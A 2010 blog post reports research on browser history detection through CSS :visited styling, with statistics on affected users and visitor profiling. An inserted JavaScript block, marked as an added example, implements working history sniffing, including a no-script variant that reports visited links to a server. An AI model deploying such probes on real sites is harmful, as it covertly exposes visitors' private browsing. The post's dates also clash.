Thursday, June 3, 2010

YOUR BROWSING HISTORY AVAILABLE FOR HACKERS


Real-world Web browser history detection results

For the last six months, this website has served as a tool to teach Internet users about Web browser history detection, which allows any website on the Internet to view the browsing history of most of its viewers.
At the same time, we were analyzing the problem in more detail to determine how many of our visitors were affected by this attack, how difficult it is to scan browsers' histories for visited sites and resources, and how much information can be gathered about most of us in this manner. We're pleased to announce that we'll be presenting our results at the Web 2.0 Security and Privacy 2010 workshop on May 20th in Oakland. You can view the full paper, or read on for the highlights.


Main results

  • How many people are affected?
    • We analyzed the results from over a quarter of a million people who ran our tests in the last few months, and found that we can detect browsing histories for over 76% of them. All major browsers allow their users' history to be detected, but it seems that users of the more modern browsers such as Safari and Chrome are more affected; we detected visited sites for 82% of Safari users and 94% of Chrome users.
    • Visitors with JavaScript turned off are just as vulnerable to history detection as those with it enabled. We detected histories for 77% of such users; for some tests, users without JavaScript had more visited sites detected than others. The detection works through CSS styling of visited links, not through script, so turning off JavaScript or installing NoScript won't help in this case; read our details page for the specifics.
  • How much information can be gathered?
    • While our tests were quite limited, for our test of the 5,000 most popular websites we detected an average of 63 visited locations (13 sites and 50 subpages on those sites); the medians were 8 and 17 respectively.
    • Almost 10% of our visitors had over 30 visited sites and 120 subpages detected -- heavy Internet users who don't protect themselves are more affected than others.
    • We also detected zipcodes our visitors had typed into online forms on sites such as Yahoo! Movies or weather.com for 9.8% of users.
  • How easy is it to detect browsing histories?
    • The ability to detect visitors' browsing history requires just a few lines of code. Armed with a list of websites to check for, a malicious webmaster can scan over 25 thousand links per second (1.5 million links per minute) in almost every recent browser.
    • Most websites and pages you view in your browser can be detected as long as they are kept in your history. Almost every address that was in your browser's address bar can be detected (this includes most pages, including those retrieved over https, and some form submissions carrying potentially private information such as your zipcode or search query). Pages won't be detected once they expire from your history (usually after a month or two), or if you manually clear it.
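The probe the two points above describe, as an added example (this is not the authors' code or their test harness): a stylesheet gives visited links a distinctive colour, hidden links are created for every URL on the candidate list, and reading each link's computed colour reveals whether it is in the browser's history. The `expandSite` helper generates the http/https, www/non-www and trailing-slash variants that a scanner has to try for each site; the hostnames, subpage paths and the `/log` endpoint are constructed for the example. The `noScriptProbe` function shows the script-free variant: each link's `:visited` rule loads a background image from a logging endpoint, so the server learns which links were visited without any JavaScript running in the victim's browser. In a browser the DOM part runs directly; under Node the DOM part is skipped so the pure helpers can be exercised on their own.

```javascript
// Added example: CSS :visited history detection. Not the authors' code.
// Assumes a page where the probing script may inject a <style> and hidden <a>
// elements; hostnames, paths and the /log endpoint below are constructed.

const VISITED_COLOR = "rgb(255, 0, 0)";   // colour given only to :visited links
const UNVISITED_COLOR = "rgb(0, 0, 255)";

// Expand one site into the URL variants a scanner has to try: both schemes,
// with and without "www.", with and without a trailing slash, plus subpages.
function expandSite(host, subpages = []) {
  const hosts = host.startsWith("www.") ? [host, host.slice(4)] : [host, "www." + host];
  const urls = new Set();
  for (const h of hosts) {
    for (const scheme of ["http", "https"]) {
      urls.add(`${scheme}://${h}`);
      urls.add(`${scheme}://${h}/`);
      for (const p of subpages) urls.add(`${scheme}://${h}${p}`);
    }
  }
  return [...urls];
}

// Browser only: inject the style rule and an off-screen container for probes.
function setupProbe(doc) {
  const style = doc.createElement("style");
  style.textContent =
    `#hist-probe a { color: ${UNVISITED_COLOR}; }` +
    `#hist-probe a:visited { color: ${VISITED_COLOR}; }`;
  doc.head.appendChild(style);
  const box = doc.createElement("div");
  box.id = "hist-probe";
  box.style.cssText = "position:absolute;left:-9999px;";
  doc.body.appendChild(box);
  return box;
}

// Browser only: the colour oracle. Create <a href=url>, read its computed
// colour (which reflects :visited in the browsers discussed), discard it.
function domLinkColor(doc, box) {
  return (url) => {
    const a = doc.createElement("a");
    a.href = url;
    a.textContent = "x";
    box.appendChild(a);
    const color = doc.defaultView.getComputedStyle(a).color;
    box.removeChild(a);
    return color;
  };
}

// Core classifier, independent of the DOM: every URL whose link colour equals
// the :visited colour is in the history. linkColor is the oracle above (or a
// stand-in when running outside a browser).
function detectVisited(urls, linkColor) {
  return urls.filter((u) => linkColor(u) === VISITED_COLOR);
}

// Script-free variant: a stylesheet plus link list where each link's :visited
// rule fetches a background image from an (assumed) logging endpoint, so the
// server learns the visited indices without any JavaScript running.
function noScriptProbe(urls, logEndpoint = "/log") {
  let css = "";
  let html = '<div id="hist-probe">';
  urls.forEach((u, i) => {
    css += `#hp${i}:visited { background-image: url(${logEndpoint}?i=${i}); }\n`;
    html += `<a id="hp${i}" href="${u}">x</a>`;
  });
  return { css, html: html + "</div>" };
}

// Run the DOM probe when loaded in a browser; skipped under Node.
if (typeof document !== "undefined") {
  const box = setupProbe(document);
  const probe = domLinkColor(document, box);
  const urls = expandSite("example.com", ["/about"]);   // constructed candidate
  console.log("visited:", detectVisited(urls, probe));
}
```

The per-link cost is one element creation and one computed-style read, which is what lets a scanner get through tens of thousands of candidate URLs per second; the list of candidates, not the probing code, is the hard part. Note that the `:visited` check matches on the exact URL string, which is why the scheme, `www.` and trailing-slash variants all have to be tried.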
More results and system design details are available in the full paper. If you'd like to learn about the steps browser vendors are taking to address the problem in next-generation browsers, read David Baron's proposal and the associated discussions in the Mozilla forums.
We are still wading through our vast dataset, and will post more results soon. As an example, below is a brief summary of the data about visitors to popular adult websites.

Who visits adult websites?

The ability to detect a Web user's browsing history can be used not only to find out potentially private information about one individual's browsing habits, but also to make more global comparisons. As an example, we chose to see which of the 243,068 users who tried out the top 5,000 popular sites test had been to one of the popular adult destinations online.
The adult websites we checked for all appeared on lists of the Web's most popular destinations (such as the Alexa and Quantcast rankings) -- overall about 100 of the 5,000 sites. For each country (determined using GeoIP and hostname data) we checked how many users had at least one adult website in their history. We discarded data from countries from which we had fewer than 500 visitors. The chart is shown below.
The geographical correlations are certainly interesting (bonus question: which two EU countries' economies have been under a lot of scrutiny recently?).
Another interesting thing to observe is the low number of visitors to the most popular adult websites from Japan, China and Korea.
We used the same technique to divide US users by the top-level domain of their hostname, shown below. It is uplifting to see such a low number of .gov and .mil users with adult sites in their histories (however, the results from our targeted adult website check of over 8,000 not-safe-for-work sites are a little less optimistic; we'll post them soon).

Please keep in mind that these results suffer from a selection bias, and should not be used as an authoritative reference. However, we have no reason to doubt the accuracy of the data, so you can still use it to amuse your friends.

Who visits the FBI most wanted list?

In addition to global comparisons, we also performed a more targeted examination of users who visited the FBI's Ten Most Wanted Fugitives page. The data was, again, taken from the top5k test; in total, 178 users had visited the link. The raw list of other websites visited by those users is available here. Several interesting observations can be made; for example, only 44% of those users had visited the main FBI page, which hints that they came from off-site or had the specific page bookmarked. In addition, some less popular Internet locations were visited by a large share of users from the analyzed group: the averages for torrent sites, adult sites, and 4chan are significantly higher than for the rest of our data set.
